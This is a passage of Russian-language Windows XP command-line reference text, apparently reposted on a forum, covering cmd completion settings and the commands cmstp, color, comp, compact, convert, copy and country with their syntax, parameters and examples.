внешние командные процессы)</p> <p>&#160; &#160; &#160; Дополнительные сведения об этих командах см. в разделе «».<br />&#160; &#160; * Включение отложенного расширения переменных среды</p> <p>&#160; &#160; &#160; Если включено отложенное расширение переменных среды, можно воспользоваться восклицательным знаком, чтобы подставить значение переменной среды во время выполнения.<br />&#160; &#160; * Включение завершения имен файлов и папок</p> <p>&#160; &#160; &#160; По умолчанию завершение имен файлов и папок не используется. Завершение имен файлов можно включить или отключить для определенного процесса команды cmd с помощью параметра /f:{on|off}. В компьютере или сеансе пользователя можно включить или отключить завершения имен файлов и папок для всех процессов команды cmd, задав следующие значения REG_DWORD:</p> <p>&#160; &#160; &#160; HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar\REG_DWORD</p> <p>&#160; &#160; &#160; HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar\REG_DWORD</p> <p>&#160; &#160; &#160; HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar\REG_DWORD</p> <p>&#160; &#160; &#160; HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar\REG_DWORD</p> <p>&#160; &#160; &#160; Чтобы задать значение REG_DWORD, запустите программу Regedit.exe и введите шестнадцатеричное число управляющего символа для определенной функции (например 0&#215;9 — это TAB, а 0&#215;08 — это BACKSPACE). Пользовательские настройки имеют приоритет над настройками компьютера, а параметры командной строки имеют приоритет над параметрами реестра.</p> <p>&#160; &#160; &#160; Внимание!<br />&#160; &#160; &#160; &#160; &#160; o Ошибка при изменении реестра может серьезно повредить систему. Перед изменением реестра создайте резервную копию всех важных данных.</p> <p>&#160; &#160; &#160; Если включено завершение имен файлов и папок с помощью параметра /f:on, воспользуйтесь клавишами CTRL+D для завершения имен папок и CTRL+F для завершения имен файлов. Чтобы отключить определенный символ завершения в реестре, введите значение пробела [0&#215;20], поскольку он не является допустимым управляющим символом.</p> <p>&#160; &#160; &#160; Если нажать клавиши CTRL+D или CTRL+F, команда cmd выполнит завершение имени папки или файла. Данные комбинации клавиш выполняют следующие функции: добавление подстановочных знаков в строку (если они отсутствуют), создание списка подходящих путей, а затем отображение первого пути из этого списка. Если ни один из путей не удовлетворяет условиям отбора, функция завершения имен файлов и папок выдает звуковой сигнал не выводит сведения на экран. Для перемещения по списку путей, удовлетворяющих условиям отбора, нажимайте клавиши CTRL+D или CTRL+F. Для перемещения по списку в обратном порядке нажмите одновременно клавишу SHIFT и клавиши CTRL+D или CTRL+F. Чтобы сбросить сохраненный список путей, удовлетворяющих условиям отбора, и создать новый список, измените строку и нажмите клавиши CTRL+D или CTRL+F. При переключении между клавишами CTRL+D и CTRL+F сохраненный список путей сбрасывается и создается новый. Единственная разница между клавишами CTRL+D и CTRL+F заключается в том, что CTRL+D позволяет отбирать только имена файлов, а CTRL+F — как имена файлов, так и имена папок. Если завершения имен файлов и папок используется с одной из встроенных команд каталогов (т. е. CD, MD или RD), предполагается завершение папок.</p> <p>&#160; &#160; &#160; Завершение имен файлов и папок правильно обрабатывает имена файлов, которые содержат пробелы или специальные символы, если соответствующий путь заключен в кавычки.</p> <p>&#160; &#160; &#160; Кавычки необходимы при использовании следующих специальных символов: &amp; &lt; &gt; [ ] { } ^ = ; ! ' + , ` ~ [пробел].</p> <p>&#160; &#160; &#160; Если вводятся сведения, содержащие пробелы, заключите этот текст в кавычки (например &quot;Имя компьютера&quot;).</p> <p>&#160; &#160; &#160; Если выполняется завершение имен файлов и папок из строки, часть [пути], расположенная справа от курсора, (т. е. с той точки строки, с которой выполняется завершение) отбрасывается.</p> <p>========================================================================================<br />Cmstp</p> <p>Установка или удаление профиля службы диспетчера подключений. Выполненная без параметров команда cmstp устанавливает профиль службы со стандартными параметрами, соответствующими данной операционной системе и разрешениям пользователя.<br />Синтаксис</p> <p>Синтаксис 1: имя_файла_профиля_службы.exe /q:a /c:&quot;cmstp.exe имя_файла_профиля_службы.inf [/nf] [/ni] [/ns] [/s] [/su] [/u]&quot;</p> <p>Синтаксис 2: cmstp.exe [/nf] [/ni] [/ns] [/s] [/su] [/u] &quot;[диск:][путь]имя_файла_профиля_службы.inf&quot;<br />Параметры</p> <p>имя_файла_профиля_службы.exe<br />&#160; &#160; Обязательный параметр для синтаксиса 1, но недопустим для синтаксиса 2. Задает имя пакета установки, содержащего профиль, который требуется установить.<br />/q:a<br />&#160; &#160; Обязательный параметр для синтаксиса 1, но недопустим для синтаксиса 2. Задает установку профиля без подтверждения пользователя. В этом случае будет отображаться сообщение об успешном завершении установки.<br />[диск:][путь]имя_файла_профиля_службы.inf<br />&#160; &#160; Обязательный параметр. Задает имя файла настройки, который определяет режим установки профиля. Параметр [диск:][путь] недопустим для синтаксиса 1.<br />/nf<br />&#160; &#160; Файлы поддержки не устанавливаются.<br />/ni<br />&#160; &#160; Значок на рабочем столе не создается. Данный параметр применяется только на компьютерах, работающих под управлением операционных систем Windows 95, Windows 98, Windows NT 4.0 или Windows Millennium Edition.<br />/ns<br />&#160; &#160; Ярлык на рабочем столе не создается. Данный параметр применяется только на компьютерах, работающих под управлением операционных систем Windows 2000 или Windows XP.<br />/s<br />&#160; &#160; Отмена уведомлений (т. е. запросов на подтверждения пользователя и сообщения об успешном завершении установки) при установке или удалении профиля службы.<br />/su<br />&#160; &#160; Профиль службы устанавливается только для одного, а не для всех пользователей. Данный параметр применяется только на компьютерах, работающих под управлением операционных систем Windows 2000 или Windows XP.<br />/u<br />&#160; &#160; Удаление профиля службы.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * /s — единственный параметр, который можно использовать вместе с /u.<br />&#160; &#160; * Синтаксис 1 обычно используется в приложении выборочной установки. Чтобы воспользоваться этим синтаксисом, необходимо запустить команду cmstp из каталога, в котором находится файл, указанный в параметре имя_файла_профиля_службы.exe.</p> <p>Примеры</p> <p>Следующие примеры иллюстрируют возможные варианты использования команды cmstp при работе с вымышленным профилем службы Fiction и его файлами.</p> <p>&#160; &#160; * Чтобы установить профиль службы Fiction без файлов поддержки, введите следующую команду:</p> <p>&#160; &#160; &#160; fiction.exe /c:&quot;cmstp.exe fiction.inf /nf&quot;<br />&#160; &#160; * Чтобы установить профиль службы Fiction для одного пользователя без уведомлений, введите следующую команду:</p> <p>&#160; &#160; &#160; fiction.exe /c:&quot;cmstp.exe fiction.inf /s /su&quot;<br />&#160; &#160; * Чтобы удалить профиль службы Fiction без уведомлений, введите следующую команду:</p> <p>&#160; &#160; &#160; fiction.exe /c:&quot;cmstp.exe fiction.inf /s /u&quot;</p> <p>========================================================================================<br />Color</p> <p>Изменение цвета текста и фона в окне командной строки для текущего сеанса. Выполненная без параметров команда color восстанавливает стандартные цвета текста и фона в окне командной строки.<br />Синтаксис</p> <p>color [тф]<br />Параметры</p> <p>тф<br />&#160; &#160; Изменение цвета текста т и фона ф. В следующей таблице перечислены допустимые шестнадцатеричные числа, которые можно задать в качестве значений параметров т и ф.<br />&#160; &#160; Значение Цвет<br />&#160; &#160; 0 Черный<br />&#160; &#160; 1 Синий<br />&#160; &#160; 2 Зеленый<br />&#160; &#160; 3 Голубой<br />&#160; &#160; 4 Красный<br />&#160; &#160; 5 Сиреневый<br />&#160; &#160; 6 Желтый<br />&#160; &#160; 7 Белый<br />&#160; &#160; 8 Серый<br />&#160; &#160; 9 Светло-синий<br />&#160; &#160; A Светло-зеленый<br />&#160; &#160; B Светло-голубой<br />&#160; &#160; C Светло-красный<br />&#160; &#160; D Светло-сиреневый<br />&#160; &#160; E Светло-желтый<br />&#160; &#160; F Яркий белый<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Чтобы задать стандартные цвета в окне командной строки, щелкните левый верхний угол этого окна, выберите команду Умолчания, перейдите к вкладке Цвета и укажите цвета для параметров Текст на экране и Фон экрана.<br />&#160; &#160; * Для изменения цветов окна командной строки в текущем сеансе можно воспользоваться командой cmd /t:тф.<br />&#160; &#160; * Если цвета текста и фона совпадают, команда color устанавливает значение параметра ERRORLEVEL в единицу (1).</p> <p>Примеры</p> <p>Чтобы изменить цвет текста на красный, а цвет фона на белый в окне командной строки, введите следующую команду:</p> <p>color FC</p> <p>========================================================================================<br />Comp</p> <p>Побайтное сравнение двух или нескольких файлов. Команда comp позволяет сравнивать файлы, находящиеся на разных дисках и в разных каталогах. При сравнении файлов с помощью команды comp выводятся их имена и расположения. Выполненная без параметров команда comp запрашивает файлы для сравнения.<br />Синтаксис</p> <p>comp [файл1] [файл2] [/d] [/a] [/l] [/n=кол_строк] [/c]<br />Параметры</p> <p>файл1<br />&#160; &#160; Задание имени и расположения первого файла или набора файлов для сравнения. Для указания нескольких файлов можно использовать подстановочные знаки (* и ?).<br />файл2<br />&#160; &#160; Задание имени и расположения второго файла или набора файлов для сравнения. Для задания нескольких файлов можно использовать подстановочные знаки (* и ?).<br />/d<br />&#160; &#160; Вывод различий в десятичном формате. (По умолчанию используется шестнадцатеричный формат.)<br />/a<br />&#160; &#160; Вывод различий в символьном виде.<br />/l<br />&#160; &#160; Вывод номера строки, в которой обнаружено различие, вместо отображения смещения в байтах.<br />/n=кол_строк<br />&#160; &#160; Сравнение первых нескольких строк, заданных параметром кол_строк, обоих файлов, даже если эти файлы имеют разный размер.<br />/c<br />&#160; &#160; Сравнение без учета регистра.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Примечания</p> <p>&#160; &#160; * Сравнение файлов с одинаковыми именами</p> <p>&#160; &#160; &#160; Если сравниваются файлы с одинаковыми именами, они должны находятся в разных каталогах или на разных дисках. Если в параметре файл2 не указано имя файла, предполагается, что имя файл2 совпадает с именем файл1. Для задания имен файлов можно использовать подстановочные знаки (* и ?).<br />&#160; &#160; * Неполное задание параметров файл1 и файл2</p> <p>&#160; &#160; &#160; Если имена файлов файл1 или файл2 введены не полностью или параметр файл2 пропущен, программа comp выведет на экран запрос для получения недостающих сведений. Если параметр файл1 содержит только имя диска или каталога без имени файла, команда comp сравнивает все файлы в заданном каталоге с файлом файл2. Если параметр файл2 содержит только имя диска или каталога, будет предполагаться, что имя файла файл2 такое же, как в параметре файл1.<br />&#160; &#160; * Вывод информации о несовпадениях</p> <p>&#160; &#160; &#160; В процессе сравнения программа comp выводит сообщения с указанием расположения несовпадающих байтов в файлах. В каждое сообщение включены сведения о смещении адреса несовпадающих байтов и содержимое этих байт (в шестнадцатеричном формате, если не указан параметр /a или /d). Эти сообщения имеют следующий формат:</p> <p>&#160; &#160; &#160; Ошибка сравнения OFFSET xxxxxxxx</p> <p>&#160; &#160; &#160; файл1 = xx</p> <p>&#160; &#160; &#160; файл2 = xx</p> <p>&#160; &#160; &#160; После того как найдено 10 различий, работа команды comp прекращается и выводится следующее сообщение:</p> <p>&#160; &#160; &#160; Обнаружено 10 различий. Сравнение завершено.<br />&#160; &#160; * Сравнение файлов разного размера</p> <p>&#160; &#160; &#160; Чтобы сравнить файлы разных размеров, необходимо указать параметр /n. Если файлы имеют различные размеры, comp выводит следующее сообщение:</p> <p>&#160; &#160; &#160; Разные размеры файлов</p> <p>&#160; &#160; &#160; Сравнить другие файлы [Y(да)/N(нет)]?</p> <p>&#160; &#160; &#160; Нажмите клавишу Y для сравнения следующей пары файлов. Нажмите клавишу N для завершения выполнения команды comp.</p> <p>&#160; &#160; &#160; При нажатии клавиши Y команда comp продолжает сравнение с заданными параметрами, пока не будет нажата клавиша N или заново введена эта команда.</p> <p>&#160; &#160; &#160; При работе с файлами разного размера воспользуйтесь параметром /n, чтобы сравнить только начала файлов.<br />&#160; &#160; * Последовательное сравнение файлов</p> <p>&#160; &#160; &#160; Если использованы подстановочные знаки (* и ?) для задания нескольких файлов, comp найдет первый файл, удовлетворяющий шаблону файл1, и выполнит его сравнение с соответствующим файлом файл2, если он существует. Команда comp выводит результаты сравнения и проводит сравнение всех файлов, удовлетворяющих шаблону файл1. После завершения работы comp будет выведено следующее сообщение:</p> <p>&#160; &#160; &#160; Сравнить другие файлы [Y(да)/N(нет)]?</p> <p>&#160; &#160; &#160; Чтобы сравнить другие файлы, нажмите клавишу Y. Команда comp запросит расположения и имена новых файлов. Чтобы завершить сравнение, нажмите клавишу N. При нажатии клавиши Y команда comp запрашивает параметры командной строки. Если эти параметры не заданы, программа comp использует параметры, введенные ранее.<br />&#160; &#160; * Если файлы не найдены</p> <p>&#160; &#160; &#160; Если командой comp не найдены указанные файлы, выводится запрос на продолжение сравнения.</p> <p>Примеры</p> <p>Чтобы сравнить содержимое каталога C:\Reports с содержимым каталога резервных копий \\Sales\Backup\April, введите следующую команду:</p> <p>comp c:\reports \\sales\backup\april</p> <p>Чтобы сравнить первые десять строк файлов в каталоге \Invoice и вывести результат в десятичном формате, введите следующую команду:</p> <p>comp \invoice\*.txt \invoice\backup\*.txt /n=10 /d</p> <p>========================================================================================<br />Compact</p> <p>Вывод сведений или изменение уплотнения файлов и каталогов в разделах NTFS. Запущенная без параметров команда compact выводит сведения об уплотнении файлов в текущем каталоге.<br />Синтаксис</p> <p>compact [{/c|/u}] [/s[:каталог]] [/a] [/i] [/f] [/q] [имя_файла[...]]<br />Параметры</p> <p>/c<br />&#160; &#160; Уплотнение заданного каталога или файла.<br />/u<br />&#160; &#160; Разуплотнение заданного каталога или файла.<br />s:каталог<br />&#160; &#160; Задание выполнения операции (уплотнения или разуплотнения) во всех подкаталогах указанного или текущего каталога.<br />/a<br />&#160; &#160; Отображение скрытых и системных файлов.<br />/i<br />&#160; &#160; Игнорирование ошибок.<br />/f<br />&#160; &#160; Принудительное уплотнение или разуплотнение каталогов или файлов. Используется в случае, когда предыдущая операция над данным каталогом или файлом была прервана в результате сбоя системы. Для полного уплотнения частично уплотненного файла используются параметры /c и /f, а также задается имя такого файла.<br />/q<br />&#160; &#160; Включение в отчет только существенных сведений.<br />имя_файла<br />&#160; &#160; Задание имени файла или каталога. Допускается использование нескольких имен файлов и подстановочных знаков (* и ?).<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Примечания</p> <p>&#160; &#160; * Команда compact является интерфейсом командной строки для встроенного средства уплотнения NTFS. Команда позволяет просматривать и задавать атрибуты уплотнения файлов и каталогов разделов дисков с файловой системой NTFS. Состояние сжатия каталога показывает, будут ли автоматически сжаты файлы, добавляемые в каталог. Когда изменяется состояние сжатия каталога, не нужно изменять состояние сжатия файлов, уже помещенных в каталог.<br />&#160; &#160; * Нельзя использовать команду compact для чтения, записи и присоединения томов, уплотненных служебными программами DriveSpace и DoubleSpace.</p> <p>Примеры</p> <p>Чтобы задать состояние уплотнения текущей папки, а также ее подпапок и существующих файлов, из этой папки, введите следующую команду:</p> <p>compact /c /s</p> <p>Чтобы задать состояние уплотнения файлов в текущей папке, а также всех ее подпапок и файлов в них, без изменения состояния самой этой папки, введите следующую команду:</p> <p>compact /c /s *.*</p> <p>Чтобы уплотнить том из корневой папки этого тома, введите следующую команду:</p> <p>compact /c /i /s:\</p> <p>В этом примере задается состояние уплотнения корневой папки и всех папок данного тома, а также уплотняются все файлы этого тома. Параметр /i позволяет отменить вывод сообщений об ошибках, чтобы не прерывать процесс уплотнения.</p> <p>Чтобы уплотнить все файлы с расширением .bmp в каталоге \Tmp и его подкаталогах, но без установки атрибута уплотнения для этих каталогов, введите следующую команду:</p> <p>compact /c /s:\tmp *.bmp</p> <p>Чтобы завершить уплотнение файла Zebra.bmp, который был частично уплотнен до сбоя системы, выполните следующую команду:</p> <p>compact /c /f zebra.bmp</p> <p>Чтобы удалить атрибуты уплотнения в каталоге C:\Tmp, но без изменения уплотнения файлов в этом каталоге, введите следующую команду:</p> <p>compact /u c:\tmp</p> <p>Продолжение... пишем сами... :D</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:27:02 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=22#p22 http://xhackx.bbon.ru/viewtopic.php?pid=21#p21 <p>Convert</p> <p>Преобразование томов с файловой системой FAT и FAT32 в тома с файловой системой NTFS.<br />Синтаксис</p> <p>convert [том] /fs:ntfs [/v] [/cvtarea:имя_файла] [/nosecurity] [/x]<br />Параметры</p> <p>том<br />&#160; &#160; Указание буквы диска (с последующим двоеточием), точки подключения или имени тома, преобразуемых в файловую систему NTFS. <br />/fs:ntfs<br />&#160; &#160; Обязательный параметр. Преобразование тома в файловую систему NTFS.<br />/v<br />&#160; &#160; Задание режима вывода дополнительной информации, т. е. в процессе преобразования выводятся все сообщения.<br />/cvtarea:имя_файла<br />&#160; &#160; Только для опытных пользователей. Задание записи основной таблицы файлов (MFT) и прочих файлов метаданных NTFS в существующий непрерывный файл-заглушку. Этот файл должен находится в корневом каталоге преобразуемой файловой системы. Использование параметра /CVTAREA позволяет получить менее фрагментированную файловую систему после преобразования. Для получения оптимальных результатов размер этого файла должен равняться числу файлов и каталогов в файловой системе, выраженному в килобайтах, однако служебная программа преобразования обрабатывает файлы любого размера.</p> <p>&#160; &#160; Дополнительные сведения о применении параметра /cvtarea см. по ссылке File Systems на веб-узле Microsoft Windows XP Resource Kits.(<a href="http://www.microsoft.com/" rel="nofollow" target="_blank">http://www.microsoft.com/</a>)</p> <p>&#160; &#160; Важно!</p> <p>&#160; &#160; &#160; &#160; * Файл-заглушку необходимо создать перед выполнением команды convert с помощью команды fsutil file createnew. Команда convert не позволяет создать этот файл. Эта команда только перезаписывает данный файл данными NTFS. После преобразования все неиспользованное пространство этого файла освобождается. Дополнительные сведения о команде fsutil file см. по ссылке «».</p> <p>/nosecurity<br />&#160; &#160; Задание свободного доступа к параметрам безопасности преобразованных файлов и каталогов.<br />/x<br />&#160; &#160; Отключение тома перед преобразованием при необходимости. Все открытые дескрипторы тома становятся недействительными.</p> <p>Примечания</p> <p>&#160; &#160; * Необходимо задать преобразование диска при перезагрузке компьютера. В противном случае отсутствует возможность преобразовать текущий диск.<br />&#160; &#160; * Если команда convert не может заблокировать диск (например системный том или текущий диск), выводится приглашение преобразовать диск при следующей перезагрузке компьютера.<br />&#160; &#160; * Основная таблица файлов (MFT) имеет другое расположение в томах, преобразованных из предыдущей версии файловой системы NTFS, поэтому их быстродействие может уступать томам, преобразованным из Windows NT.<br />&#160; &#160; * Тома, преобразованные из файловой системы FAT в NTFS, несколько уступают по быстродействию томам, непосредственно отформатированным в NTFS. В преобразованных томах основная таблица файлов (MFT) может оказаться фрагментированной. Кроме того, в преобразованных загрузочных томах разрешения на доступ NTFS недействительны после преобразования тома.</p> <p>Примеры</p> <p>Чтобы преобразовать тома на диске E в формат NTFS и вывести все сообщения, введите следующую команду:</p> <p>convert e: /fs:ntfs /v</p> <p>========================================================================================<br />Copy</p> <p>Копирование одного или нескольких файлов из одного расположения в другое.<br />Синтаксис</p> <p>copy [/d] [/v] [/n] [{/y|/-y}] [/z] [{/a|/b}] источник [{/a|/b}] [+ источник [{/a|/b}] [+ ...]] [назначение [{/a|/b}]]<br />Параметры</p> <p>/d<br />&#160; &#160; Сохранение копируемых шифрованных файлов как расшифрованных в месте назначения.<br />/v<br />&#160; &#160; Проверка правильности копирования путем сравнения копий файлов.<br />/n<br />&#160; &#160; Использование короткого имени (при наличии) копируемого файла, если его имя превышает 8 символов или его расширение превышает 3 символа.<br />/y<br />&#160; &#160; Отмена вывода запроса на подтверждение перезаписи существующего конечного файла.<br />/-y<br />&#160; &#160; Вывод запроса на подтверждение перезаписи существующего конечного файла.<br />/z<br />&#160; &#160; Копирование файлов по сети в режиме перезапуска.<br />/a<br />&#160; &#160; Указание текстового файла в формате ASCII. <br />/b<br />&#160; &#160; Указание двоичного файла.<br />источник<br />&#160; &#160; Обязательный параметр. Задание расположение файла или набора файлов, которые требуется скопировать. Параметр источник может состоять из имени диска с двоеточием, имени папки, имени файла или их комбинации.<br />назначение<br />&#160; &#160; Обязательный параметр. Задание расположения, в которое требуется скопировать файл или набор файлов. Параметр назначение может состоять из имени диска с двоеточием, имени папки, имени файла или их комбинации.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Примечания</p> <p>&#160; &#160; * Имеется возможность скопировать текстовый файл, в котором используется символ конца файла (CTRL+Z) для обозначения конца файла.<br />&#160; &#160; * Использование параметра /a</p> <p>&#160; &#160; &#160; Если параметр /a стоит перед списком файлов в командной строке, он применяется ко всем файлам, перечисленным до параметра /b команды copy. В этом случае /b применяется к файлу, предшествующему /b.</p> <p>&#160; &#160; &#160; Если параметр /a стоит после списка файлов в командной строке, он применяется ко всем файлам, перечисленным до параметра /b команды copy. В этом случае /b применяется к файлу, предшествующему /b.</p> <p>&#160; &#160; &#160; Результат применения параметра /a зависит от его положения в командной строке. Если параметр /a стоит после параметра источник, команда copy обрабатывает файл как текстовый в формате ASCII и копирует данные, которые находятся перед первым символом конца файла.</p> <p>&#160; &#160; &#160; Если параметр /a расположен после параметра назначение, команда copy добавляет символ конца файла как последний символ файла.<br />&#160; &#160; * Использование параметра /b</p> <p>&#160; &#160; &#160; Параметр /b задает считывание командным процессором количества байт, равного размеру файла в каталоге. Параметр /b задается по умолчанию для команды copy, за исключением случаев использования copy для слияния файлов.</p> <p>&#160; &#160; &#160; Если параметр /b стоит перед списком файлов в командной строке, он применяется ко всем файлам, перечисленным до параметра /a команды copy. В этом случае /a применяется к файлу, предшествующему /a.</p> <p>&#160; &#160; &#160; Если параметр /b стоит после списка файлов в командной строке, он применяется ко всем файлам, перечисленным до параметра /a команды copy. В этом случае /a применяется к файлу, предшествующему /a.</p> <p>&#160; &#160; &#160; Результат применения параметра /b зависит от его положения в командной строке. Если параметр /b стоит после параметра источник, команда copy копирует файл целиком, включая все символы конца строки.</p> <p>&#160; &#160; &#160; Если параметр /b стоит после параметра назначение, команда copy не добавляет символ конца строки.<br />&#160; &#160; * Использование параметра /v</p> <p>&#160; &#160; &#160; Если операция записи не может быть проверена, выводится сообщение об ошибке. Хотя ошибки записи редко возникают при работе с командой copy, параметром /v можно воспользоваться для проверки правильности записи важных данных. Параметр /v также завершает работу команды copy, поскольку необходимо проверить каждый сектор, записанный на диск.<br />&#160; &#160; * Использование параметров /y и /-y</p> <p>&#160; &#160; &#160; Если параметр /y установлен заранее в переменной среды COPYCMD, можно переопределить эту настройку, указав параметр /-y в командной строке. При переопределении данной настройки по умолчанию выводится запрос, за исключением исключением случаев выполнения команды copy в пакетном файле.<br />&#160; &#160; * Объединение файлов</p> <p>&#160; &#160; &#160; Чтобы объединить файлы, укажите один файл в параметре назначение и несколько в параметре источник (используя подстановочные знаки или формат файл1+файл2+файл3).<br />&#160; &#160; * Использование параметра /z</p> <p>&#160; &#160; &#160; Если во время фазы копирования теряется сетевое подключение (например, если сервер переходит в автономный режим, разрывая подключение), команда copy /z позволяет продолжить копирование после восстановления подключения. Кроме того, параметр /z позволяет отобразить сведения о завершении операции копирования в процентах для каждого файла.<br />&#160; &#160; * Использование внешних устройств в операциях копирования</p> <p>&#160; &#160; &#160; В качестве параметров источник и назначение можно указать имена устройств.<br />&#160; &#160; * Использование параметра /b при копировании на устройство</p> <p>&#160; &#160; &#160; Если в параметре назначение указано устройство (например Com1 или Lpt1), параметр /b позволяет скопировать данные на это устройство в двоичном режиме. В двоичном режиме команда copy /b копирует все символы (включая управляющие символы, такие как CTRL+C, CTRL+S, CTRL+Z и перевод строки) на устройство как данные. Однако если параметр /b не указан, данные копируются на устройство в формате ASCII. В этом режиме управляющие символы могут вызвать слияние файлов в системе Windows XP в процессе копирования. Дополнительные сведения см. в разделе «Слияние файлов».<br />&#160; &#160; * Использование стандартного имени конечного файла</p> <p>&#160; &#160; &#160; Если конечный файл не задан, по умолчанию файлы будут скопированы с тем же именем, датой и временем создания в текущий каталог на текущем диске. Если исходный файл находится в текущем каталоге на текущем диске, выполнение команды copy завершается и выводится следующее сообщение об ошибке:</p> <p>&#160; &#160; &#160; Невозможно скопировать файл в себя</p> <p>&#160; &#160; &#160; Скопировано файлов: 0<br />&#160; &#160; * Слияние файлов</p> <p>&#160; &#160; &#160; Если введено несколько параметров источник, разделенных знаком плюс (+), команда copy объединяет файлы в один. Если в параметре источник использованы подстановочные знаки (* или ?), а в параметре назначение задан один файл, команда copy объединит все файлы, удовлетворяющие шаблону в параметре источник, в один с именем, указанным в параметре назначение. В обоих случаях, если не задан параметр /b, команда copy объединяет файлы как текстовые.<br />&#160; &#160; * Копирование файлов нулевой длины</p> <p>&#160; &#160; &#160; Команда Copy не копирует файлы, которые имеют длину, равную 0 байт. Для выполнения этой операции служит команда xcopy.<br />&#160; &#160; * Изменение даты и времени модификации файла</p> <p>&#160; &#160; &#160; Если требуется установить текущую дату и время в качестве даты модификации файла без изменения его содержимого, воспользуйтесь следующим синтаксисом:</p> <p>&#160; &#160; &#160; copy /b источник+,,</p> <p>&#160; &#160; &#160; Запятые заменяют параметр назначение.<br />&#160; &#160; * Копирование файлов в подкаталогах</p> <p>&#160; &#160; &#160; Для копирования всех файлов каталога и его подкаталогов служит команда xcopy. Дополнительные сведения о команде xcopy см. по ссылке «».<br />&#160; &#160; * Команда copy с другими параметрами доступна в консоли восстановления. </p> <p>Примеры</p> <p>Чтобы скопировать файл Memo.doc в файл Letter.doc на текущем диске и убедиться, что символ конца файла находится в конце скопированного файла, введите следующую команду:</p> <p>copy memo.doc letter.doc /a</p> <p>Чтобы скопировать файл Robin.typ с текущего каталога на текущем диске в существующий каталог Birds на диске C, введите следующую команду:</p> <p>copy robin.typ c:\birds</p> <p>Если каталог Birds не существует, файл Robin.typ будет скопирован в файл с именем Birds в корневой каталог диска C.</p> <p>Чтобы скопировать несколько файлов в один, перечислите несколько файлов в параметре источник, разделяя их имена значком плюс (+), и укажите в параметре назначение файл, который должен содержать результат объединения этих файлов. Например, чтобы объединить файлы Mar89.rpt, Apr89.rpt и May89.rpt из текущего каталога на текущем диске и поместить их в файл Report в текущем каталоге на текущем диске, введите следующую команду:</p> <p>copy mar89.rpt + apr89.rpt + may89.rpt report</p> <p>При объединении команда copy создает конечный файл с текущими датой и временем. Если параметр назначение не указан, файлы объединяются и сохраняются в файле с именем первого файла в списке. Например, чтобы объединить четыре файла в файле Report, если такой файл уже существует, введите следующую команду:</p> <p>copy report + mar89.rpt + apr89.rpt + may89.rpt</p> <p>Кроме того, несколько файлов можно объединить в один с помощью символов подстановки (* или ?). Например, чтобы объединить все файлы с расширением .txt в текущем каталоге на текущем диске в файл Combin.doc, введите следующую команду:</p> <p>copy *.txt combin.doc</p> <p>Если требуется объединить несколько двоичных файлов в один с использованием подстановочных знаков, воспользуйтесь параметром /b. В результате CTRL+Z не будет рассматриваться как символ конца файла в Windows XP. Например, введите следующую команду:</p> <p>copy /b *.exe combin.exe</p> <p>Внимание!</p> <p>&#160; &#160; * Если объединяются двоичные файлы, результат может оказаться непригодным из-за нарушения внутреннего форматирования. </p> <p>В следующем примере команда copy объединяет каждый файл с расширением .txt с соответствующим ему файлом с расширением .ref. Результатом является файл с тем же именем, но с расширением .doc. Таким образом, команда copy объединит файлы File1.txt и File1.ref в файл File1.doc, затем файлы File2.txt и File2.ref в файл File2.doc и т. д. Например, введите следующую команду:</p> <p>copy *.txt + *.ref *.doc</p> <p>Чтобы объединить сначала все файлы с расширением .txt, а затем все файлы с расширением .ref в файл Combin.doc, введите следующую команду:</p> <p>copy *.txt + *.ref combin.doc</p> <p>========================================================================================<br />Country</p> <p>Задание использования подсистемой MS-DOS международного формата для времени, дат, валют, разделителей и преобразования символов.<br />Синтаксис</p> <p>country=xxx[,[yyy][,[диск:][путь] имя_файла]]<br />Параметры</p> <p>xxx<br />&#160; &#160; Задание кода страны.<br />yyy<br />&#160; &#160; Задание кодовой страницы для данного кода страны.<br />[диск:][путь] имя_файла<br />&#160; &#160; Задание местонахождения и имени файла, содержащего информацию о национальных форматах.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Примечания</p> <p>&#160; &#160; * Команда country обеспечивает распознавание подсистемой MS-DOS набора символов и соглашения о пунктуации при использовании одного из поддерживаемых национальных языков. Используйте файл %системный_корневой_каталог%\System32\Config.nt или эквивалентный файл запуска, указанный в PIF-файле программы, для загрузки настройки Код страны.<br />&#160; &#160; * Установка поддерживаемых языков</p> <p>&#160; &#160; &#160; В следующей таблице перечислены страны и языки, поддерживаемые подсистемой MS-DOS. В ней также перечислены кодовые страницы, которые могут быть использованы с этими кодами стран. Например, если используется код страны 003, при задании параметра yyy можно использовать только кодовые страницы 437 или 850. Первая из двух кодовых страниц, перечисленных для каждой страны/региона или языка, является кодовой страницей, используемой по умолчанию.<br />&#160; &#160; &#160; Страна/регион или язык Код страны/региона Кодовые страницы<br />&#160; &#160; &#160; США 001 437, 850<br />&#160; &#160; &#160; Французский (Канада) 002 863, 850<br />&#160; &#160; &#160; Голландия 031 850, 437<br />&#160; &#160; &#160; Бельгия 032 850, 437<br />&#160; &#160; &#160; Франция 033 850, 437<br />&#160; &#160; &#160; Испания 034 850, 437<br />&#160; &#160; &#160; Венгрия 036 852, 850<br />&#160; &#160; &#160; Италия 039 850, 437<br />&#160; &#160; &#160; Швейцария 041 850, 437<br />&#160; &#160; &#160; Чешская республика 042 852, 850<br />&#160; &#160; &#160; Словакия 042 852, 850<br />&#160; &#160; &#160; Великобритания 044 437, 850<br />&#160; &#160; &#160; Дания 045 850, 865<br />&#160; &#160; &#160; Швеция 046 850, 437<br />&#160; &#160; &#160; Норвегия 047 850, 865<br />&#160; &#160; &#160; Польша 048 852, 850<br />&#160; &#160; &#160; Германия 049 850, 437<br />&#160; &#160; &#160; Бразилия 055 850, 437<br />&#160; &#160; &#160; Международный английский 061 437, 850<br />&#160; &#160; &#160; Португалия 351 850, 860<br />&#160; &#160; &#160; Финляндия 358 850, 437<br />&#160; &#160; * Задание национального формата для времени и даты</p> <p>&#160; &#160; &#160; Код страны задает формат времени и даты, 